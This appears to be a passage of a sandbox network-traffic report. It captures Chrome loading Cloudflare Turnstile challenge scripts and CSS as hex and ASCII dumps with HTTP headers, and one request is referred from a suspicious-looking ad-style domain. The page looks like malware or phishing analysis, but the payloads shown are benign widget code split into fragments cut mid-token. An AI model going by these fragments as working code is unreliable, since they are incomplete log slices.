                                                                                                                                      2024-05-08 18:12:33 UTC1369INData Raw: 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 52 65 28 65 2c 72 29 7b 76 61 72 20 74 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 73 5b 30 5d 26 31 29 74 68 72 6f 77 20 73 5b 31 5d 3b 72 65 74 75 72 6e 20 73 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 6c 2c 73 2c 6d 3b 72 65 74 75 72 6e 20 6d 3d 7b 6e 65 78 74 3a 62 28 30 29 2c 74 68 72 6f 77 3a 62 28 31 29 2c 72 65 74 75 72 6e 3a 62 28 32 29 7d 2c 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 6d
                                                                                                                                      Data Ascii: urn e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Re(e,r){var t={label:0,sent:function(){if(s[0]&1)throw s[1];return s[1]},trys:[],ops:[]},o,l,s,m;return m={next:b(0),throw:b(1),return:b(2)},typeof Symbol=="function"&&(m
                                                                                                                                      2024-05-08 18:12:33 UTC1369INData Raw: 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 4f 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4f 65 3d 33 30 30 30 33 30 3b 76 61 72 20 46 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 3d 22 69 6e 76 69 73 69 62 6c 65 22 7d 29 28 46 7c 7c 28 46 3d 7b 7d 29 29 3b 76 61 72 20 56 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 4f 52 4d 41 4c 3d 22 6e 6f 72 6d 61 6c 22
                                                                                                                                      Data Ascii: ked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ot=300020;var Oe=300030;var F;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(F||(F={}));var V;(function(e){e.NORMAL="normal"
                                                                                                                                      2024-05-08 18:12:33 UTC1369INData Raw: 3d 22 73 74 72 69 6e 67 22 26 26 70 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 76 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 4a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 76 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b 72 65 74 75 72 6e
                                                                                                                                      Data Ascii: ="string"&&pr.test(e)}var vr=/^[a-z0-9_\-=]{0,255}$/i;function Je(e){return e===void 0?!0:typeof e=="string"&&vr.test(e)}function Ze(e){return N(["normal","compact","invisible"],e)}function et(e){return N(["auto","manual","never"],e)}function tt(e){return
                                                                                                                                      2024-05-08 18:12:33 UTC1369INData Raw: 68 2c 22 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 73 69 7a 65 29 2e 63 6f 6e 63 61 74 28 64 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c
                                                                                                                                      Data Ascii: h,"turnstile/if/ov2/av0/rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(t.theme,"/").concat(t.size).concat(d)}function ke(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function Bt(e,
                                                                                                                                      2024-05-08 18:12:33 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 6f 29 7b 69 66 28 6f 3d 3d 3d 6e 75 6c 6c 7c 7c 21 71 74 28 6f 29 29 72 65 74 75 72 6e 20 6f 3b 69 66 28 74 79 70 65 6f 66 20 6f 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 7b 69 66 28 72 2e 68 61 73 28 6f 29 29 72 65 74 75 72 6e 20 72 2e 67 65 74 28 6f 29 3b 72 2e 73 65 74 28 6f 2c 6c 29 7d 66 75 6e 63 74 69 6f 6e 20 6c 28 29 7b 72 65 74 75 72 6e 20 78 65 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 61 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74
                                                                                                                                      Data Ascii: nction(o){if(o===null||!qt(o))return o;if(typeof o!="function")throw new TypeError("Super expression must either be null or a function");if(typeof r!="undefined"){if(r.has(o))return r.get(o);r.set(o,l)}function l(){return xe(o,arguments,ae(this).construct
                                                                                                                                      2024-05-08 18:12:33 UTC1369INData Raw: 6e 64 20 54 75 72 6e 73 74 69 6c 65 20 73 63 72 69 70 74 20 74 61 67 2c 20 73 6f 6d 65 20 66 65 61 74 75 72 65 73 20 6d 61 79 20 6e 6f 74 20 62 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 34 33 37 37 37 29 3b 76 61 72 20 72 3d 7b 6c 6f 61 64 65 64 41 73 79 6e 63 3a 21 31 2c 70 61 72 61 6d 73 3a 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 7d 3b 28 65 2e 61 73 79 6e 63 7c 7c 65 2e 64 65 66 65 72 29 26 26 28 72 2e 6c 6f 61 64 65 64 41 73 79 6e 63 3d 21 30 29 3b 76 61 72 20 74 3d 65 2e 73 72 63 2c 6f 3d 74 2e 73 70 6c 69 74 28 22 3f 22 29 3b 72 65 74 75 72 6e 20 6f 2e 6c 65 6e 67 74 68 3e 31 26 26 28 72 2e 70 61 72 61 6d 73 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 6f 5b 31 5d 29 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 44 28 29 7b
                                                                                                                                      Data Ascii: nd Turnstile script tag, some features may not be available",43777);var r={loadedAsync:!1,params:new URLSearchParams};(e.async||e.defer)&&(r.loadedAsync=!0);var t=e.src,o=t.split("?");return o.length>1&&(r.params=new URLSearchParams(o[1])),r}function D(){
                                                                                                                                      2024-05-08 18:12:33 UTC1369INData Raw: 30 70 78 22 2c 79 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 79 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 32 30 22 2c 79 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 31 70 78 22 2c 79 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 43 6f 6c 6f 72 3d 22 23 30 30 30 22 2c 79 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 53 74 79 6c 65 3d 22 73 6f 6c 69 64 22 2c 79 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 2c 79 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 61 64 69 75 73 3d 22 31 30 70 78 22 2c 79 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 2d 31 32 32 70 78 22 2c 79 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 31 70 78 22 2c 79 2e 73 74 79 6c 65 2e
                                                                                                                                      Data Ascii: 0px",y.style.position="absolute",y.style.zIndex="21474836420",y.style.borderWidth="1px",y.style.borderColor="#000",y.style.borderStyle="solid",y.style.backgroundColor="#ffffff",y.style.borderRadius="10px",y.style.left="-122px",y.style.top="-91px",y.style.
                                                                                                                                      2024-05-08 18:12:33 UTC1369INData Raw: 29 3b 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 2d 77 69 64 74 68 22 2c 22 33 22 29 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 74 72 6f 6b 65 22 2c 22 23 66 66 66 22 29 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 31 38 22 29 2c 63 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 32 22 2c 22 35 22 29 2c 69 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 29 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 4e 53 28 22 68 74 74 70 3a
                                                                                                                                      Data Ascii: );c.setAttribute("stroke-width","3"),c.setAttribute("stroke","#fff"),c.setAttribute("fill","none"),c.setAttribute("x1","6"),c.setAttribute("x2","18"),c.setAttribute("y1","18"),c.setAttribute("y2","5"),i.appendChild(c);var a=document.createElementNS("http:


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.1649729104.17.3.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:34 UTC819OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/l704j/0x4AAAAAAAXFrE9g55weHUfb/auto/normal HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                      Referer: https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-05-08 18:12:34 UTC1332INHTTP/1.1 200 OK
                                                                                                                                      Date: Wed, 08 May 2024 18:12:34 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      document-policy: js-profiling
                                                                                                                                      origin-agent-cluster: ?1
                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                      referrer-policy: same-origin
                                                                                                                                      accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                      permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                      cross-origin-embedder-policy: require-corp
                                                                                                                                      cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                      content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                      critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                      2024-05-08 18:12:34 UTC146INData Raw: 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 6f 70 65 6e 65 72 2d 70 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 0d 0a 76 61 72 79 3a 20 61 63 63 65 70 74 2d 65 6e 63 6f 64 69 6e 67 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 38 30 62 36 62 33 35 36 61 32 38 32 37 36 36 2d 53 45 41 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cross-origin-opener-policy: same-originvary: accept-encodingServer: cloudflareCF-RAY: 880b6b356a282766-SEAalt-svc: h3=":443"; ma=86400
                                                                                                                                      2024-05-08 18:12:34 UTC56INData Raw: 33 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 0d 0a
                                                                                                                                      Data Ascii: 32<!DOCTYPE HTML><html lang="en-US"><head> <me
                                                                                                                                      2024-05-08 18:12:34 UTC1369INData Raw: 31 63 31 62 0d 0a 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c
                                                                                                                                      Data Ascii: 1c1bta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="preload" href="/cdn-cgi/chall
                                                                                                                                      2024-05-08 18:12:34 UTC1369INData Raw: 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 72 6f 62 6f 74 6f 2c 20 6f 78 79 67 65 6e 2c 20 75 62 75 6e 74 75 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 2d 77 65 62 6b
                                                                                                                                      Data Ascii: height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont, "Segoe UI", roboto, oxygen, ubuntu, "Helvetica Neue", arial, sans-serif; font-size: 14px; font-weight: 400; -webk
                                                                                                                                      2024-05-08 18:12:34 UTC1369INData Raw: 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 32 34 32 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 32 34
                                                                                                                                      Data Ascii: 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterlimit: 10;}#success-icon .p1 { stroke-dasharray: 242; stroke-dashoffset: 24
                                                                                                                                      2024-05-08 18:12:34 UTC1369INData Raw: 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a
                                                                                                                                      Data Ascii: error-text a:focus { color: #949494;}.theme-dark .ctp-checkbox-label .mark { border: 2px solid #dadada; background-color: #222;}.theme-dark .ctp-checkbox-label input:focus ~ .mark, .theme-dark .ctp-checkbox-label input:active ~ .mark { border:
                                                                                                                                      2024-05-08 18:12:34 UTC1369INData Raw: 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c
                                                                                                                                      Data Ascii: me-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.theme-dark #fr-hel
                                                                                                                                      2024-05-08 18:12:34 UTC358INData Raw: 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 76 69 73 69 74 65 64 2c 0a 23 63 68 61 6c 6c 65
                                                                                                                                      Data Ascii: r-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-overlay a:link,#challenge-error-text a:visited,#challe
                                                                                                                                      2024-05-08 18:12:34 UTC1369INData Raw: 63 33 30 0d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 36 36 33 37 39 3b 0a 7d 0a 0a 23 6c 6f 67 6f 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 36 70 78 3b 0a 7d 0a 0a 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 31 36 36 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f
                                                                                                                                      Data Ascii: c30#challenge-overlay a:focus,#challenge-error-text a:active,#challenge-error-text a:hover,#challenge-error-text a:focus { color: #166379;}#logo { margin-bottom: 1px; height: 26px;}.failure-circle { stroke-dasharray: 166; stroke-dasho
                                                                                                                                      2024-05-08 18:12:34 UTC1369INData Raw: 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 3a 3a 61 66 74 65 72 20 7b 0a 20 20 74 6f 70 3a 20 33 70 78 3b 0a 20 20 6c 65 66 74 3a 20 38 70 78 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 34 35 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 30 20 34 70 78 20 34 70 78 20 30 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 32 70 78 3b 0a 7d 0a 2e 63 74 70 2d 63 68 65 63 6b
                                                                                                                                      Data Ascii: ackground-color: white;}.ctp-checkbox-label input:checked ~ .mark::after { top: 3px; left: 8px; transform: rotate(45deg) scale(1); border: solid #c44d0e; border-width: 0 4px 4px 0; border-radius: 0; width: 6px; height: 12px;}.ctp-check


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      12192.168.2.1649730104.17.3.1844435152C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-05-08 18:12:35 UTC710OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=880b6b356a282766 HTTP/1.1
                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
